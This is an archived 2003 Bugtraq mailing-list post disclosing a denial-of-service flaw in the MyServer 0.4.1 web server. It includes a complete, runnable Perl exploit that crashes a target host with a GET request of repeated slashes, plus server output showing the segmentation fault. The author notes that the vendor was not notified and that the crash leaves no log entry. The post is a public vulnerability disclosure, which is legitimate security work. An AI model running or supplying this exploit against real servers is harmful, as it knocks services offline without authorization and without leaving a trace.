lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.44.0306220036020.4117-100000@oakey.no-ip.com>
Date: Sun, 22 Jun 2003 00:37:00 +0100 (BST)
From: eip@...ey.no-ip.com
To: bugtraq@...urityfocus.com
Subject: Myserver 0.4.1 DOS..


hi...


Topic:  	MyServer 0.4.1 DOS

Product: 	Myserver 0.4.1 (http://myserverweb.sourceforge.net)

Note:  		yep, I'm on the dole, anyone wanna give me a job :)

Vendor Notification:	Woooops, sorry i forgot ;)


Background:

(from homepage)
MyServer is a free and easy to configure web server. MyServer is licensed 
under the GNU General Public License (GPL). See the license page for 
additional info.
Myserver runs under both Windows and Linux..
Although there is allready several found flaws in Myserver, I thought that 
the closet bug to this was:
http://www.securityfocus.org/bid/7770/info/

but that was using excessive amounts of data.. We only need to use 20 "//" 
to cause a Dos condition..


Problem Description:

When Myserver is running a simple GET request can cause a Remote Denial of 
service, stopping the HTTP server
alltogether.. 
Also an extra note, this DOS doesn't get entered into the log file ;) 

Impact:

Denial of service..possible code execution, haven't tested it fully 
yet..still finding holes  ;)

Patch:

Nope i don't do patches.... ;)

Exploit:
----------------myserver.pl------------------------
#!/usr/bin/perl
 
#Myserver 0.4.1 Remote Denial of service ;)
#oh joy...
#deadbeat, uk2sec
#eip@...ey.no-ip.com
#deadbeat@....lonestar.org
 
use IO::Socket;
$dos = "//"x100;
$request = "GET $dos"."HTTP/1.0\r\n\r\n";
 
$target = $ARGV[0];
 
print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
print "deadbeat, uk2sec..\n";
print "usage: perl $0 <target>\n";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>"80",
        PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";
print $sox $request;
sleep 2;
close $sox;
print "Done...\n";
------------------EOF--------------------------

Looks like this from the server side:
-------------------------
**************************************
************myServer 0.4.1************
**************************************
Initializing server configuration...
Using english language
Server configuration terminated
Security access is not used, the web folder contents is accessible to 
anyone
Initializing socket library...
Socket library was initialized
Computer name is: uk2sec-labs.no-ip.com
IP Address #0: 192.168.0.1
Loading MIME types...
MIME types loaded successfully: 139
Number of processors: 1
Creating thread 0...
Thread created
Creating listening thread...
Creating server socket...
Server socket created
Trying to binding port...
Port is binded
Trying to listen on port...
Listen on port: 80
Listening thread is created
myServer is now ready to accept connections
Press Ctrl+C to break execution
Segmentation fault
--------------------------

Tested on:	Linux (redhat 9.0)
	

hello:
bazarr, good luck out there man ;) 


regards,

deadbeat





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ